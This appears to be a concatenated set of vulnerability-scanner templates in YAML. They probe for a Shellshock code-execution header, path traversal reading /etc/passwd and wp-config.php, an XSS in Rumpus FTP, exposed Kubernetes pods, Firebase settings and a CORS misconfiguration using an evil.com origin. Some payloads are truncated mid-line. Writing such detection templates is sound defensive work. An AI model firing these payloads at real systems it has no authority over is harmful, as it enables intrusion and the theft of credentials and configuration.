7 | # http://ghostlulz.com/google-exposed-firebase-database/
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Could not parse auth token"
17 | part: body
18 |
--------------------------------------------------------------------------------
/panels/kubernetes-pods.yaml:
--------------------------------------------------------------------------------
1 | id: kubernetes-pods-api
2 | info:
3 | name: Kubernetes Pods API
4 | author: ilovebinbash
5 | severity: informative
6 | requests:
7 | - method: GET
8 | path:
9 | - '{{BaseURL}}:10250/pods'
10 | matchers:
11 | - type: word
12 | words:
13 | - "apiVersion"
14 | part: body
15 | - type: word
16 | words:
17 | - "application/json"
18 | part: header
19 |
--------------------------------------------------------------------------------
/vulnerabilities/rce-shellshock-user-agent.yaml:
--------------------------------------------------------------------------------
1 | id: rce-user-agent-shell-shock
2 |
3 | info:
4 | name: Remote Code Execution Via (User-Agent)
5 | author: 0xelkomy
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | headers:
11 | User-Agent: "{ :;}; echo $("
19 | part: body
20 |
--------------------------------------------------------------------------------
/cves/CVE-2018-7490.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-7490
2 |
3 | info:
4 | name: uWSGI PHP Plugin Directory Traversal
5 | author: madrobot
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
12 | matchers:
13 | - type: status
14 | status:
15 | - 200
16 | - type: regex
17 | regex:
18 | - "root:[x*]:0:0:"
19 | part: body
20 |
--------------------------------------------------------------------------------
/files/tomcat-scripts.yaml:
--------------------------------------------------------------------------------
1 | id: tomcat-scripts
2 |
3 | info:
4 | name: Detect Tomcat Exposed Scripts
5 | author: Co0nan
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/examples/servlets/index.html"
12 | - "{{BaseURL}}/examples/jsp/index.html"
13 | matchers:
14 | - type: word
15 | words:
16 | - "JSP Examples"
17 | - "JSP Samples"
18 | - "Servlets Examples"
19 |
--------------------------------------------------------------------------------
/security-misconfiguration/basic-cors.yaml:
--------------------------------------------------------------------------------
1 | id: basic-cors-misconfig
2 |
3 | info:
4 | name: Basic CORS misconfiguration
5 | author: nadino
6 | severity: medium
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}"
12 | headers:
13 | Origin: "https://evil.com"
14 | matchers:
15 | - type: word
16 | words:
17 | - "Access-Control-Allow-Origin: https://evil.com"
18 | part: header
19 |
--------------------------------------------------------------------------------
/technologies/gitlab-detect.yaml:
--------------------------------------------------------------------------------
1 | id: Gitlab-Detect
2 |
3 | info:
4 | name: Detect Gitlab
5 | author: ehsahil
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/users/sign_in"
12 | - "{{BaseURL}}/users/sign_up"
13 | - "{{BaseURL}}/explore"
14 | matchers:
15 | - type: word
16 | words:
17 | - "GitLab"
18 | - "Register for GitLab"
19 | - "Explore GitLab"
20 |
--------------------------------------------------------------------------------
/vulnerabilities/wordpress-duplicator-path-traversal.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-duplicator-path-traversal
2 |
3 | info:
4 | name: WordPress duplicator Path Traversal
5 | author: madrobot
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php"
12 | matchers:
13 | - type: word
14 | words:
15 | - "DB_NAME"
16 | part: body
17 |
--------------------------------------------------------------------------------
/examples/dns-multiple-example.yaml:
--------------------------------------------------------------------------------
1 | id: dns-multiple-example
2 |
3 | info:
4 | name: DNS Multiple test
5 | author: pdteam
6 | severity: info
7 |
8 | dns:
9 | - name: "{{FQDN}}"
10 | type: A
11 | class: inet
12 | recursion: true
13 | retries: 3
14 | matchers-condition: and
15 | matchers:
16 | - type: word
17 | words:
18 | - "example-cname.com"
19 |
20 | - type: word
21 | words:
22 | - "NXDOMAIN"
23 |
--------------------------------------------------------------------------------
/cves/CVE-2019-19368.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2019-19368
2 |
3 | info:
4 | name: Rumpus FTP Web File Manager 8.2.9.1 XSS
5 | author: madrobot
6 | severity: medium
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/Login?!'>